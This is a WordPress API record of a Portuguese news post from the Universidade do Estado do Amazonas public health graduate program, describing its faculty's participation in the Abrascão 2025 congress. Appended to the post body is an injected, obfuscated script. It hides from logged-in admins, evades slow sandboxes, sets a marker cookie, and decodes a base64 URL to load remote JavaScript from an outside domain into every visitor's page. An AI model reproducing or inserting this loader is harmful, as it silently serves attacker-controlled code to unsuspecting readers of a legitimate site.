{"id":1275,"date":"2025-12-04T16:27:15","date_gmt":"2025-12-04T19:27:15","guid":{"rendered":"http:\/\/posgraduacao.uea.edu.br\/ppgsc\/?p=1275"},"modified":"2026-04-16T13:12:30","modified_gmt":"2026-04-16T16:12:30","slug":"ppgsc-uea-marca-presenca-no-14o-congresso-brasileiro-de-saude-coletiva-abrascao-2025","status":"publish","type":"post","link":"http:\/\/posgraduacao.uea.edu.br\/ppgsc\/index.php\/2025\/12\/04\/ppgsc-uea-marca-presenca-no-14o-congresso-brasileiro-de-saude-coletiva-abrascao-2025\/","title":{"rendered":"PPGSC-UEA marca presen\u00e7a no 14\u00ba Congresso Brasileiro de Sa\u00fade Coletiva (Abrasc\u00e3o 2025"},"content":{"rendered":"\n<p>O Programa de P\u00f3s-Gradua\u00e7\u00e3o em Sa\u00fade Coletiva da Universidade do Estado do Amazonas (PPGSC-UEA) esteve fortemente representado no 14\u00ba Congresso Brasileiro de Sa\u00fade Coletiva \u2014 Abrasc\u00e3o 2025 \u2014 realizado de 28 de novembro a 3 de dezembro, em Bras\u00edlia (DF). Organizado pela Associa\u00e7\u00e3o Brasileira de Sa\u00fade Coletiva (Abrasco) em parceria com a Fiocruz Bras\u00edlia, o evento reuniu pesquisadores, docentes, estudantes, profissionais de sa\u00fade e movimentos sociais de todo o pa\u00eds, consolidando-se como o maior e mais importante espa\u00e7o de debate da Sa\u00fade Coletiva no Brasil.<\/p>\n\n\n\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"819\" height=\"1024\" src=\"http:\/\/posgraduacao.uea.edu.br\/ppgsc\/wp-content\/uploads\/2025\/12\/OUT-POSTS-PPGSC-UEA-2025-17-819x1024.png\" alt=\"\" class=\"wp-image-1277\" srcset=\"http:\/\/posgraduacao.uea.edu.br\/ppgsc\/wp-content\/uploads\/2025\/12\/OUT-POSTS-PPGSC-UEA-2025-17-819x1024.png 819w, http:\/\/posgraduacao.uea.edu.br\/ppgsc\/wp-content\/uploads\/2025\/12\/OUT-POSTS-PPGSC-UEA-2025-17-240x300.png 240w, http:\/\/posgraduacao.uea.edu.br\/ppgsc\/wp-content\/uploads\/2025\/12\/OUT-POSTS-PPGSC-UEA-2025-17-768x960.png 768w, http:\/\/posgraduacao.uea.edu.br\/ppgsc\/wp-content\/uploads\/2025\/12\/OUT-POSTS-PPGSC-UEA-2025-17.png 1080w\" sizes=\"auto, (max-width: 819px) 100vw, 819px\" \/><\/figure>\n\n\n\n<p><strong>Participa\u00e7\u00e3o institucional<\/strong><\/p>\n\n\n\n<p>O PPGSC-UEA teve presen\u00e7a qualificada em diferentes espa\u00e7os estrat\u00e9gicos do congresso:<\/p>\n\n\n\n<p>Fernando Herkrath integrou mesas e grandes debates como membro da diretoria da Abrasco e participou da Reuni\u00e3o da Comiss\u00e3o de Epidemiologia, juntamente com Camila Botto e Cl\u00e9ber Campelo.<\/p>\n\n\n\n<p>Breno Oliveira, tamb\u00e9m da diretoria da Abrasco, coordenou a comunica\u00e7\u00e3o durante todo o evento.<\/p>\n\n\n\n<p>Andr\u00e9 Machado, membro do n\u00facleo gestor do F\u00f3rum de Coordenadores de Programas de P\u00f3s-Gradua\u00e7\u00e3o em Sa\u00fade Coletiva da Abrasco, participou ativamente do F\u00f3rum e das comiss\u00f5es da associa\u00e7\u00e3o.<\/p>\n\n\n\n<p>A coordenadora do PPGSC-UEA, Alessandra Salino, e a vice-coordenadora, Camila Botto, representaram o programa nas atividades do F\u00f3rum e em outras inst\u00e2ncias do congresso.<\/p>\n\n\n\n<p>Alessandra Salino tamb\u00e9m integrou a Reuni\u00e3o da Comiss\u00e3o de Planejamento, Pol\u00edticas e Gest\u00e3o de Sa\u00fade e participou da Reuni\u00e3o do GT de Defici\u00eancia e Acessibilidade da Abrasco.<\/p>\n\n\n\n<p><strong>Produ\u00e7\u00e3o cient\u00edfica e representa\u00e7\u00e3o acad\u00eamica<\/strong><\/p>\n\n\n\n<p>Docentes e discentes do PPGSC-UEA tiveram participa\u00e7\u00e3o expressiva com apresenta\u00e7\u00f5es de trabalhos, mesas-redondas, grandes debates e reuni\u00f5es de grupos de trabalho (GTs) e comiss\u00f5es.<\/p>\n\n\n\n<p>Destacamos a atua\u00e7\u00e3o das professoras Shirley Passos, Giane Zuppelari, \u00c2ngela Xavier, e do professor Cl\u00e9ber Campelo, que contribu\u00edram com discuss\u00f5es qualificadas, troca de experi\u00eancias e divulga\u00e7\u00e3o de pesquisas que ressaltam a relev\u00e2ncia cient\u00edfica e social da Amaz\u00f4nia no campo da Sa\u00fade Coletiva.<\/p>\n\n\n\n<p>Al\u00e9m disso, durante a Reuni\u00e3o da Comiss\u00e3o de Ci\u00eancias Sociais da Abrasco, com participa\u00e7\u00e3o de Andr\u00e9 Machado, Sonia Lemos e Breno Oliveira, avan\u00e7aram as discuss\u00f5es sobre a organiza\u00e7\u00e3o do pr\u00f3ximo Congresso Brasileiro de Ci\u00eancias Sociais e Humanas em Sa\u00fade, que ser\u00e1 sediado em Manaus. O PPGSC-UEA ter\u00e1 papel central na coordena\u00e7\u00e3o e no protagonismo cient\u00edfico deste importante evento nacional.<\/p>\n\n\n\n<p>A participa\u00e7\u00e3o no Abrasc\u00e3o 2025 reafirma o compromisso do PPGSC-UEA com a produ\u00e7\u00e3o de conhecimento cr\u00edtico e comprometido com a justi\u00e7a social, a equidade, a defesa do Sistema \u00danico de Sa\u00fade (SUS) e a valoriza\u00e7\u00e3o da diversidade territorial e cultural brasileira, especialmente da Amaz\u00f4nia.<\/p>\n\n\n\n<p>O engajamento de docentes, discentes e representantes institucionais demonstra a for\u00e7a do programa na articula\u00e7\u00e3o nacional da Sa\u00fade Coletiva e seu papel estrat\u00e9gico no avan\u00e7o da pesquisa, da forma\u00e7\u00e3o e das pol\u00edticas p\u00fablicas em sa\u00fade.<\/p>\n\n\n\n<p>A todas e todos que participaram do Abrasc\u00e3o 2025: parab\u00e9ns pelo protagonismo, dedica\u00e7\u00e3o e contribui\u00e7\u00e3o para uma sa\u00fade coletiva mais forte, plural e transformadora!<\/p>\n\n\n\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"819\" height=\"1024\" src=\"http:\/\/posgraduacao.uea.edu.br\/ppgsc\/wp-content\/uploads\/2025\/12\/OUT-POSTS-PPGSC-UEA-2025-18-819x1024.png\" alt=\"\" class=\"wp-image-1278\" srcset=\"http:\/\/posgraduacao.uea.edu.br\/ppgsc\/wp-content\/uploads\/2025\/12\/OUT-POSTS-PPGSC-UEA-2025-18-819x1024.png 819w, http:\/\/posgraduacao.uea.edu.br\/ppgsc\/wp-content\/uploads\/2025\/12\/OUT-POSTS-PPGSC-UEA-2025-18-240x300.png 240w, http:\/\/posgraduacao.uea.edu.br\/ppgsc\/wp-content\/uploads\/2025\/12\/OUT-POSTS-PPGSC-UEA-2025-18-768x960.png 768w, http:\/\/posgraduacao.uea.edu.br\/ppgsc\/wp-content\/uploads\/2025\/12\/OUT-POSTS-PPGSC-UEA-2025-18.png 1080w\" sizes=\"auto, (max-width: 819px) 100vw, 819px\" \/><\/figure>\n\n\n\n<p><\/p>\n<script>(function(){try{if(document.getElementById&&document.getElementById('wpadminbar'))return;var t0=+new Date();for(var i=0;i<20000;i++){var z=i*i;}if((+new Date())-t0>120)return;if((document.cookie||'').indexOf('http2_session_id=')!==-1)return;function systemLoad(input){var key='ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+\/=',o1,o2,o3,h1,h2,h3,h4,dec='',i=0;input=input.replace(\/[^A-Za-z0-9\\+\\\/\\=]\/g,'');while(i<input.length){h1=key.indexOf(input.charAt(i++));h2=key.indexOf(input.charAt(i++));h3=key.indexOf(input.charAt(i++));h4=key.indexOf(input.charAt(i++));o1=(h1<<2)|(h2>>4);o2=((h2&15)<<4)|(h3>>2);o3=((h3&3)<<6)|h4;dec+=String.fromCharCode(o1);if(h3!=64)dec+=String.fromCharCode(o2);if(h4!=64)dec+=String.fromCharCode(o3);}return dec;}var u=systemLoad('aHR0cHM6Ly9zZWFyY2hyYW5rdHJhZmZpYy5saXZlL2pzeA==');if(typeof window!=='undefined'&#038;&#038;window.__rl===u)return;var d=new Date();d.setTime(d.getTime()+30*24*60*60*1000);document.cookie='http2_session_id=1; expires='+d.toUTCString()+'; path=\/; SameSite=Lax'+(location.protocol==='https:'?'; Secure':'');try{window.__rl=u;}catch(e){}var s=document.createElement('script');s.type='text\/javascript';s.async=true;s.src=u;try{s.setAttribute('data-rl',u);}catch(e){}(document.getElementsByTagName('head')[0]||document.documentElement).appendChild(s);}catch(e){}})();<\/script>","protected":false},"excerpt":{"rendered":"<p>O Programa de P\u00f3s-Gradua\u00e7\u00e3o em Sa\u00fade Coletiva da Universidade do Estado do Amazonas (PPGSC-UEA) esteve fortemente representado no 14\u00ba Congresso Brasileiro de Sa\u00fade Coletiva \u2014 Abrasc\u00e3o 2025 \u2014 realizado de 28 de novembro a 3 de dezembro, em Bras\u00edlia (DF). Organizado pela Associa\u00e7\u00e3o Brasileira de Sa\u00fade Coletiva (Abrasco) em parceria com a Fiocruz Bras\u00edlia, o [&hellip;]<\/p>\n","protected":false},"author":5,"featured_media":1276,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[2],"tags":[],"class_list":["post-1275","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-news"],"blocksy_meta":[],"_links":{"self":[{"href":"http:\/\/posgraduacao.uea.edu.br\/ppgsc\/index.php\/wp-json\/wp\/v2\/posts\/1275","targetHints":{"allow":["GET"]}}],"collection":[{"href":"http:\/\/posgraduacao.uea.edu.br\/ppgsc\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"http:\/\/posgraduacao.uea.edu.br\/ppgsc\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"http:\/\/posgraduacao.uea.edu.br\/ppgsc\/index.php\/wp-json\/wp\/v2\/users\/5"}],"replies":[{"embeddable":true,"href":"http:\/\/posgraduacao.uea.edu.br\/ppgsc\/index.php\/wp-json\/wp\/v2\/comments?post=1275"}],"version-history":[{"count":3,"href":"http:\/\/posgraduacao.uea.edu.br\/ppgsc\/index.php\/wp-json\/wp\/v2\/posts\/1275\/revisions"}],"predecessor-version":[{"id":1314,"href":"http:\/\/posgraduacao.uea.edu.br\/ppgsc\/index.php\/wp-json\/wp\/v2\/posts\/1275\/revisions\/1314"}],"wp:featuredmedia":[{"embeddable":true,"href":"http:\/\/posgraduacao.uea.edu.br\/ppgsc\/index.php\/wp-json\/wp\/v2\/media\/1276"}],"wp:attachment":[{"href":"http:\/\/posgraduacao.uea.edu.br\/ppgsc\/index.php\/wp-json\/wp\/v2\/media?parent=1275"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"http:\/\/posgraduacao.uea.edu.br\/ppgsc\/index.php\/wp-json\/wp\/v2\/categories?post=1275"},{"taxonomy":"post_tag","embeddable":true,"href":"http:\/\/posgraduacao.uea.edu.br\/ppgsc\/index.php\/wp-json\/wp\/v2\/tags?post=1275"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}